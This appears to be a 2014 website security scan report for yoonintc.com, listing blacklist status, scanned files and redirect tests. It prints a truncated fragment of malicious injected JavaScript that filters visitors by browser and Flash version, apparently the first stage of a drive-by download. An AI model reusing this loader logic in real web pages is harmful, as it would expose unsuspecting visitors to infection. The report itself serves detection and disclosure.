Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=yoonintc.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://yoonintc.com/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://yoonintc.com/ | 200 OK Content-Length: 26068 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var AxkDH0=navigator.userAgent.toLowerCase(); var MDjS0="1"+"1"+"1"; if(document.cookie.indexOf("JdOFkiW3=")==-1 && AxkDH0.indexOf("linux")<=-1 && AxkDH0.indexOf("bot")==-1 && AxkDH0.indexOf("spider")==-1) { var zCmecXt2=deconcept.SWFObjectUtil.getPlayerVersion(); var expires=new Date(); expires.setTime(expires.getTime()+24*60*60*1000); MDjS0="0"+"0"; document.cookie="JdOFkiW3=Yes;path=/;expires="+expires.toGMTString(); dIthsk5="1"+" } <script type="text/javascript" src="http://js.tongji.linezing.com/3259577/tongji.js"> Antivirus reports:
| ||
http://yoonintc.com/swfobject.js | HTTP/1.1 302 Found Connection: close Date: Thu, 02 Oct 2014 20:29:14 GMT Location: http://404.mireene.com/error/404.html Server: Microsoft-IIS/9.0 Content-Length: 294 Content-Type: text/html; charset=iso-8859-1 | clean |
http://404.mireene.com/error/404.html | 200 OK Content-Length: 538 Content-Type: text/html | clean |
http://404.mireene.com/test404page.js | HTTP/1.1 302 Found Connection: close Date: Thu, 02 Oct 2014 20:29:15 GMT Location: http://404.mireene.com/error/404.html Server: Microsoft-IIS/9.0 Content-Length: 297 Content-Type: text/html; charset=iso-8859-1 | clean |
http://yoonintc.com/jpg.js | HTTP/1.1 302 Found Connection: close Date: Thu, 02 Oct 2014 20:29:16 GMT Location: http://404.mireene.com/error/404.html Server: Microsoft-IIS/9.0 Content-Length: 294 Content-Type: text/html; charset=iso-8859-1 | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: yoonintc.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 02 Oct 2014 20:29:11 GMT
Server: Microsoft-IIS/9.0
Content-Type: text/html
GET / HTTP/1.1
Host: yoonintc.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 02 Oct 2014 20:29:11 GMT
Server: Microsoft-IIS/9.0
Content-Type: text/html
Second query (visit from search engine):
GET / HTTP/1.1
Host: yoonintc.com
Referer: http://www.google.com/search?q=yoonintc.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: yoonintc.com
Referer: http://www.google.com/search?q=yoonintc.com
Result:
The result is similar to the first query. There are no suspicious redirects found.